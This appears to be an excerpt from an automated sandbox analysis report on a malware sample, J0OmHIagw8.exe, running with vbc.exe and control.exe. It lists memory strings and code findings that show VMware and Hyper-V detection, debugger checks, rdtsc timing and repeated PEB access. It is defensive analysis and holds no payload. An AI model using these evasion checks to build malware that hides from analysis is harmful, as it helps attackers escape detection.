Source: explorer.exe, 00000006.00000000.251346760.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004088B0 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00409B20 LdrLoadDll,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05403D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05443540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05473D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0544A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05478DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05408EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05482073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
